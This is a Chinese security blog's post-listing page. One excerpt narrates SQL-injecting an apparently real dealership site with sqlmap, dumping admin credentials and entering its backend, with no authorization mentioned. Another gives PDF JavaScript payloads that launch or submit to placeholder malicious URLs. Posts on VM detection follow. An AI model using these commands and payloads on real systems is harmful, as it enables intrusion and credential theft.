<
首页
关于
友链
友链申请
Search
1
小程序Appid、AppSecret泄露漏洞总结
132 阅读
2
从未授权访问到随意进出后台
91 阅读
3
无视锁屏状态安卓手机远程控制安卓手机实现远程打卡2
90 阅读
4
技术岗为什么要写博客
63 阅读
5
PDF XSS攻击总结
51 阅读
学习笔记
渗透实纪
经验总结
漏洞分析
基础教学
工具推荐
插件
工具
想法杂谈
闲言碎语
灵光乍现
乱七八糟
生活小记
我的爱好
登录
找到
29
篇与
学习笔记
相关的结果
- 第 6 页
2023-10-28
通过sql注入拿下站点
SQL注入漏洞 站点首页 发现首页有试乘试驾预约功能,输入常规内容跳出弹窗说明功能正常 尝试在姓名栏中填入单引号,提交后出现报错界面 呕吼,有报错,有戏。重新抓取提交信息的数据包,经过测试发现chexing、name、phone参数都存在报错 出现报错信息这一看就是sql注入漏洞啊,直接复制数据包通过sqlmap验证 sqlmap.py -r 文件 -p name -dbs --risk=3 --level=5 查表 查询jynhqc_db中的表 sqlmap.py -r 文件 -D jynhqc_db -tables -dbs 查列 查询web_admin表中的列 sqlmap.py -r 文件 -p name -D jynhqc_db -T web_admin -columns -dbs 查字段 查询a_user,a_name,a_psw的内容 sqlmap.py -r 文件 -p name -D jynhqc_db -T web_admin -C a_user,a_name,a_psw -dump 多处漏洞 到这个地方就已经知道了管理员账号和密码,不过还需要知道站点的后台地址。后面通过目录爆破知道了后台地址,并成功登录到后台 在后台发现有网站还有在线留言功能,看到这个页面和试乘试驾预约功能页面一模一样,推断这个功能一样存在漏洞。 在前台找到在线留言功能,经过测试发现在线留言的name、iphone、email、company、content参数都存在注入漏洞 在首页的下属企业进入页面后选择试乘试驾同样都存在漏洞 至此这个站点前台的注入漏洞都找完了,那开始找后台的注入点……不想写了后台到处都是注入点,可以说随便点一下都是sql注入漏洞
渗透实纪
xioy
2年前
0
11
0
2023-10-17
PDF XSS攻击总结
工具地址 https://www.xunjiepdf.com/editor制作教程 进入工具,依次点击文件 -> 新建文档 -> 从空白页 然后再次点击文件 -> 文档属性 点击JavaScript -> 添加 在编辑器中添加如下代码: app.alert("TNT"); 保存后即可在浏览器中看到弹窗 常用的JavaScript注入攻击函数 通过弹出恶意警告框来干扰用户或欺骗用户 app.alert("恶意代码");通过导出数据对象来触发恶意文件的下载或执行 this.exportDataObject({ cName: "恶意文件", nLaunch: 2, cDIPath: "http://恶意网站/恶意文件" });通过提交表单来触发恶意脚本的执行 this.submitForm({ cURL: "http://恶意网站/恶意脚本" });变种漏洞的总结 除了基本的PDF XSS,还存在一些变种漏洞,下面是关于这些变种漏洞的总结: JavaScript注入 这种变种漏洞利用PDF文件中的JavaScript功能,攻击者可以将恶意的JavaScript代码嵌入到PDF文件中,当用户打开PDF文件时,恶意脚本会被执行。这种漏洞可以用于执行各种恶意操作,如窃取用户的敏感信息、修改用户的数据等。 PDF链接跳转 这种变种漏洞利用PDF文件中的链接跳转功能,攻击者可以在PDF文件中创建一个看似正常的链接,但实际上是指向一个恶意网站的链接。当用户点击这个链接时,会被重定向到恶意网站,从而可能遭受钓鱼攻击或下载恶意软件。 PDF表单攻击 这种变种漏洞利用PDF文件中的表单功能,攻击者可以在PDF文件中创建一个看似正常的表单,但实际上其中的字段可能包含恶意脚本代码。当用户填写表单并提交时,恶意脚本会被执行,从而可能导致数据泄露或其他恶意操作。 PDF文件解析漏洞 这种变种漏洞利用PDF阅读器的解析漏洞,攻击者可以通过构造特定的PDF文件,利用解析漏洞来执行恶意操作。这种漏洞通常需要PDF阅读器的相关软件供应商发布安全补丁来修复。
经验总结
xioy
2年前
0
51
0
2023-09-20
Windows下如何判断服务器是虚拟机还是物理机
Systeminfo命令 Systeminfo命令是windows系统中显示系统信息的命令,此命令可以显示出计算机的操作系统的详细配置信息,包括操作系统配置、安全信息、产品ID和硬件属性(如 RAM、磁盘空间和网卡)。cmd使用以下命令: systeminfo Get-WmiObject命令 powershell使用Get-WmiObject命令来获取电源,服务,进程,系统,网络IP等。powershell使用以下命令: get-wmiobject win32_computersystem
经验总结
xioy
2年前
0
7
0
2023-09-20
Linux下如何判断服务器是虚拟机还是物理机
dmesg命令 dmesg命令显示linux内核的环形缓冲区信息,我们可以从中获得诸如系统架构、cpu、挂载的硬件,RAM等多个运行级别的大量的系统信息。使用以下命令: dmesg | grep -i hypervisor dmidecode命令 dmidecode命令可以获取有关系统硬件的详细信息,包括制造商信息。虚拟机通常会在制造商信息中显示虚拟化平台的名称。在终端中运行以下命令: dmidecode -s system-product-name lscpu命令 lscpu命令在Linux下输出与系统CPU相关的信息。此命令从/proc/cpuinfo和sysfs文件中检索CPU的体系结构(线程、CPU高速缓存、CPU 系列型号、内核、CPU数量等)信息,并将其显示在终端中。使用以下命令: lscpu | grep Hypervisor lscpi命令 lspci命令是用于列出所有PCI总线上的设备信息,输出结果包括:设备的类别、型号、厂商、状态、IRQ等信息。输出结果的每一行对应一个设备,通常默认按照总线、设备号、功能号的顺序排列。使用以下命令: lspci | grep -i virtual lshw命令 lshw命令收集关于主机的硬件(比如处理器、磁盘、内存和USB控制器等)和配置大量信息。使用以下命令: lshw -class system systemd-detect-virt命令 systemd-detect-virt用于检测系统的运行环境是否为虚拟化环境,以及更进一步检测是哪种虚拟化环境,比如是哪种虚拟机或哪种容器。使用以下命令: systemd-detect-virt virt-what命令 virt-what实际上是一个Shell脚本。它通过各种启发式方法来识别虚拟化环境类型,可以检测出QEMU/KVM、VMware、Hyper-V、VirtualBox、OpenVZ/Virtuozzo、Xen、LXC、IBM PowerVM以及Parallels等平台类型。使用以下命令: virt-what 检查/sys文件系统 在/sys文件系统中有一个文件可以帮助你确定系统是虚拟机还是物理机。使用以下命令: cat /sys/class/dmi/id/product_name
经验总结
xioy
2年前
0
14
0
上一页
1
...
5
6